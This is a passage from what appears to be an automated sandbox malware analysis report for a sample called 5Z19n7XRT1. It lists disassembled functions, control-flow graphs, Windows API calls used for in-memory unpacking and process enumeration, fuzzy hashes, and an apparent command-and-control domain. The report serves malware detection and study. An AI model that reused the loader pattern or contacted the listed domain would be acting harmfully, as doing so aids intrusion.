                                                                                                                                                                                                                                                                          control_flow_graph 413 4210e0-421128 call 43c9a0 416 42112e-421190 call 414040 call 438e30 413->416 417 42188f-42189f 413->417 423 421192-421195 416->423 424 421197-4211bd 423->424 425 4211bf-4211c3 423->425 424->423 426 4211c5-4211d0 425->426 427 4211d2 426->427 428 4211d7-4211f0 426->428 429 42128f-421292 427->429 430 4211f2 428->430 431 4211f7-421202 428->431 434 421296-42129b 429->434 435 421294 429->435 432 42127e-421283 430->432 431->432 433 421204-421274 call 43a9b0 431->433 437 421287-42128a 432->437 438 421285 432->438 441 421279 433->441 439 4212a1-4212b1 434->439 440 4217be-4217f3 call 438e70 434->440 435->434 437->426 438->429 442 4212b3-4212e1 439->442 447 4217f5-4217f8 440->447 441->432 444 4212e7-421306 442->444 445 421499-42149d 442->445 449 421308-42130b 444->449 448 42149f-4214a2 445->448 450 421822-421828 447->450 451 4217fa-421820 447->451 452 4214a4-4214a8 448->452 453 4214aa-4214bb call 438e30 448->453 454 421367-421383 call 4218a0 449->454 455 42130d-421365 449->455 457 42182a-421830 450->457 451->447 458 4214cf-4214d1 452->458 472 4214cb-4214cd 453->472 473 4214bd-4214c6 453->473 454->445 466 421389-4213b2 454->466 455->449 461 421832 457->461 462 421834-421846 457->462 464 4214d7-4214f6 458->464 465 42178c-421791 458->465 467 42188d 461->467 470 42184a-421850 462->470 471 421848 462->471 474 4214f8-4214fb 464->474 468 421793-42179b 465->468 469 42179d-4217a1 465->469 477 4213b4-4213b7 466->477 467->417 478 4217a3 468->478 469->478 479 421878-42187b 470->479 480 421852-421874 call 43a9b0 470->480 471->479 472->458 481 4217a5-4217a9 473->481 475 421535-421570 474->475 476 4214fd-421533 474->476 482 421572-421575 475->482 476->474 483 4213b9-4213da 477->483 484 4213dc-4213f7 call 4218a0 477->484 478->481 487 42187f-42188b 479->487 488 42187d 479->488 480->479 481->442 486 4217af-4217b4 481->486 489 421577-42159d 482->489 490 42159f-4215ad 482->490 483->477 501 421402-421419 484->501 502 4213f9-4213fd 484->502 496 4218a0-4218b4 486->496 497 4217ba-4217bc 486->497 487->457 488->467 489->482 494 4215b1-4215bc 490->494 499 4215c3-4215e0 494->499 500 4215be 494->500 498 4218c0-4218c2 496->498 497->440 504 4218c4-4218cf 498->504 505 4218dc-4218e0 498->505 507 4215e2-4215e6 499->507 508 4215eb-4215fc 499->508 506 42169e-4216a1 500->506 509 42141b 501->509 510 42141d-421497 call 407f60 call 413c70 call 407f70 501->510 502->448 513 4218d1-4218d4 504->513 514 4218d8-4218da 504->514 511 4216a3-4216aa 506->511 512 4216ae-4216cd 506->512 515 42168d-421692 507->515 508->515 516 421602-42167c call 43a9b0 508->516 509->510 510->448 511->512 518 4216cf-4216d2 512->518 513->498 519 4218d6 513->519 514->505 522 421696-421699 515->522 523 421694 515->523 526 421681-421688 516->526 524 4216d4-42171b 518->524 525 42171d-42172d 518->525 519->505 522->494 523->506 524->518 528 421767-42176a 525->528 529 42172f-421733 525->529 526->515 532 42177b-42177d 528->532 533 42176c-421779 call 438e70 528->533 531 421735-42173c 529->531 536 42173e-42174a 531->536 537 42174c-421759 531->537 535 42177f-421782 532->535 533->535 535->465 541 421784-42178a 535->541 536->531 542 42175b 537->542 543 42175d 537->543 541->481 545 421763-421765 542->545 543->545 545->528
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: !@$,$T$U$V$h
                                                                                                                                                                                                                                                                          • API String ID: 0-1072848446
                                                                                                                                                                                                                                                                          • Opcode ID: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
                                                                                                                                                                                                                                                                          • Instruction ID: 7f4f8c271271a0ee30063bf5d57d9afa0b4a7bb7edff0777766b2e5d54dfe869
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b37148a9dca08e68feec6fc32ee7d5c05668dd5b0338c2dc7096b623dae1273
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF22E17160C3A08FD320DF28D44436FBBE1ABD6314F598A2EE5D9873A1D77988458B4B
                                                                                                                                                                                                                                                                          Function 0040CFF3 Relevance: 7.8, Strings: 6, Instructions: 291COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 547 40cff3-40d003 548 40d010-40d03a 547->548 548->548 549 40d03c-40d06f call 408660 call 4361e0 548->549 554 40d070-40d0b1 549->554 554->554 555 40d0b3-40d0ff 554->555 556 40d100-40d157 555->556 556->556 557 40d159-40d163 556->557 558 40d165-40d168 557->558 559 40d17b-40d189 557->559 560 40d170-40d179 558->560 561 40d18b-40d18f 559->561 562 40d19d 559->562 560->559 560->560 564 40d190-40d199 561->564 563 40d1a0-40d1a8 562->563 565 40d1aa-40d1ab 563->565 566 40d1bb-40d1c9 563->566 564->564 567 40d19b 564->567 568 40d1b0-40d1b9 565->568 569 40d1db-40d29f 566->569 570 40d1cb-40d1cf 566->570 567->563 568->566 568->568 572 40d2a0-40d2e3 569->572 571 40d1d0-40d1d9 570->571 571->569 571->571 572->572 573 40d2e5-40d2fe 572->573 574 40d300-40d330 573->574 574->574 575 40d332-40d34f call 40ba00 574->575 577 40d354-40d36e 575->577
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: BI$F1177B6615FB90FCF9F1B7136A1E0C5E$ZG$lev-tolstoi.com$3ej$pr
                                                                                                                                                                                                                                                                          • API String ID: 0-3022268974
                                                                                                                                                                                                                                                                          • Opcode ID: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction ID: f448791ebc0dd286385b88dc6d7820084d2eda887077436efc4f1c5c77796cf1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f72a1af4f7c4914e3558ee5fe4304fc6666decd496300a2b177a412071557166
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44A1D6B56007818FD714CF29C590A22BFE2FF96300B1995ADC4D69F7A6DB38E806CB54
                                                                                                                                                                                                                                                                          Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 578 408790-4087a1 call 43a360 581 408970-408972 ExitProcess 578->581 582 4087a7-4087ae call 4336c0 578->582 585 4087b4-4087d8 GetCurrentProcessId GetCurrentThreadId 582->585 586 40896b call 43a930 582->586 588 4087da-4087dc 585->588 589 4087de-408878 SHGetSpecialFolderPathW GetForegroundWindow 585->589 586->581 588->589 590 4088f3-40895f call 409bc0 589->590 591 40887a-4088f1 589->591 590->586 594 408961 call 40cb90 590->594 591->590 596 408966 call 40b9d0 594->596 596->586
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004087B4
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004087BE
                                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 00408870
                                                                                                                                                                                                                                                                            • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32(0040896B), ref: 0040B9D6
                                                                                                                                                                                                                                                                            • Part of subcall function 0040B9D0: FreeLibrary.KERNEL32 ref: 0040B9F7
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00408972
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5
                                                                                                                                                                                                                                                                          Function 008B977E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 620 8b977e-8b9797 621 8b9799-8b979b 620->621 622 8b979d 621->622 623 8b97a2-8b97ae CreateToolhelp32Snapshot 621->623 622->623 624 8b97be-8b97cb Module32First 623->624 625 8b97b0-8b97b6 623->625 626 8b97cd-8b97ce call 8b943d 624->626 627 8b97d4-8b97dc 624->627 625->624 630 8b97b8-8b97bc 625->630 631 8b97d3 626->631 630->621 630->624 631->627
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008B97A6
                                                                                                                                                                                                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 008B97C6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008B8000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_8b8000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3833638111-0
                                                                                                                                                                                                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction ID: 9e424f49af782735572f4a7c828e8b0cde0ddadc512c8b0917c27f34e52cb274
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F062312107146BE7202FB9A88DAAA76E8FF49724F100528E786D16C0DE70EC454AA5
                                                                                                                                                                                                                                                                          Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 636 43cb20-43cb34 637 43cb40-43cb49 636->637 637->637 638 43cb4b-43cb5f 637->638 639 43cb61-43cb66 638->639 640 43cb68 638->640 641 43cb6f-43cb96 call 407f60 639->641 640->641 644 43cbb1-43cc1f 641->644 645 43cb98-43cb9b 641->645 647 43cc20-43cc34 644->647 646 43cba0-43cbaf 645->646 646->644 646->646 647->647 648 43cc36-43cc42 647->648 649 43cc44-43cc4f 648->649 650 43cc89-43cc97 call 407f70 648->650 651 43cc50-43cc57 649->651 658 43cc99-43cc9d 650->658 659 43cc9f-43cca8 650->659 653 43cc60-43cc66 651->653 654 43cc59-43cc5c 651->654 653->650 657 43cc68-43cc7d call 43a9b0 653->657 654->651 656 43cc5e 654->656 656->650 661 43cc82-43cc87 657->661 658->659 661->650
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: @$ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                          • Opcode ID: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
                                                                                                                                                                                                                                                                          • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e85ccf3c634bb8eb18bb8f5a370902e051506c7f06aba8c0c1ef036a9d8f182
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                          Function 0040B44C Relevance: 1.6, Strings: 1, Instructions: 345COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: h d"
                                                                                                                                                                                                                                                                          • API String ID: 0-862628183
                                                                                                                                                                                                                                                                          • Opcode ID: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                                          • Instruction ID: e7b26040d347b48bd15f509a2e92d141a5522c4f34e33ed28b849909e17f734e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 907832ec394077f3cb61ce921fa134c81a3c0afbaec0ddbe82e25e94bded95fe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81B1CF79204700CFD3248F74EC91B67B7F6FB4A301F058A7DE99682AA0D774A859CB18
                                                                                                                                                                                                                                                                          Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                          • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                          • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                          Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
                                                                                                                                                                                                                                                                          • Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa3d1f857265f2d1eec240e1ce09a33a68e210528346f5167762aa40738f4e39
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A
                                                                                                                                                                                                                                                                          Function 0043B05B Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
                                                                                                                                                                                                                                                                          • Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d951b1bf8575b638b514a071f1e27b8906d3225ac76758bc526cbf2df91afa5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD
                                                                                                                                                                                                                                                                          Function 0040BDC9 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                          • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A
                                                                                                                                                                                                                                                                          Function 0249003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 83 249003c-2490047 84 2490049 83->84 85 249004c-2490263 call 2490a3f call 2490e0f call 2490d90 VirtualAlloc 83->85 84->85 100 249028b-2490292 85->100 101 2490265-2490289 call 2490a69 85->101 103 24902a1-24902b0 100->103 105 24902ce-24903c2 VirtualProtect call 2490cce call 2490ce7 101->105 103->105 106 24902b2-24902cc 103->106 112 24903d1-24903e0 105->112 106->103 113 2490439-24904b8 VirtualFree 112->113 114 24903e2-2490437 call 2490ce7 112->114 116 24904be-24904cd 113->116 117 24905f4-24905fe 113->117 114->112 119 24904d3-24904dd 116->119 120 249077f-2490789 117->120 121 2490604-249060d 117->121 119->117 125 24904e3-2490505 LoadLibraryA 119->125 123 249078b-24907a3 120->123 124 24907a6-24907b0 120->124 121->120 126 2490613-2490637 121->126 123->124 127 249086e-24908be LoadLibraryA 124->127 128 24907b6-24907cb 124->128 129 2490517-2490520 125->129 130 2490507-2490515 125->130 131 249063e-2490648 126->131 135 24908c7-24908f9 127->135 132 24907d2-24907d5 128->132 133 2490526-2490547 129->133 130->133 131->120 134 249064e-249065a 131->134 136 2490824-2490833 132->136 137 24907d7-24907e0 132->137 138 249054d-2490550 133->138 134->120 139 2490660-249066a 134->139 141 24908fb-2490901 135->141 142 2490902-249091d 135->142 140 2490839-249083c 136->140 143 24907e2 137->143 144 24907e4-2490822 137->144 145 24905e0-24905ef 138->145 146 2490556-249056b 138->146 147 249067a-2490689 139->147 140->127 148 249083e-2490847 140->148 141->142 143->136 144->132 145->119 151 249056d 146->151 152 249056f-249057a 146->152 149 249068f-24906b2 147->149 150 2490750-249077a 147->150 155 2490849 148->155 156 249084b-249086c 148->156 157 24906ef-24906fc 149->157 158 24906b4-24906ed 149->158 150->131 151->145 153 249059b-24905bb 152->153 154 249057c-2490599 152->154 166 24905bd-24905db 153->166 154->166 155->127 156->140 160 249074b 157->160 161 24906fe-2490748 157->161 158->157 160->147 161->160 166->138
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14
                                                                                                                                                                                                                                                                          Function 0043AB0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 613 43ab0b-43ab1f 614 43ab20-43ab7b 613->614 614->614 615 43ab7d-43abce GetForegroundWindow call 43c7d0 614->615
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0043AB9F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ForegroundWindow
                                                                                                                                                                                                                                                                          • String ID: ilmn
                                                                                                                                                                                                                                                                          • API String ID: 2020703349-1560153188
                                                                                                                                                                                                                                                                          • Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286
                                                                                                                                                                                                                                                                          Function 0040EA11 Relevance: 3.1, APIs: 2, Instructions: 116COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 619 40ea11-40eb75 CoInitializeEx * 2
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002), ref: 0040EA15
                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040EB5C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
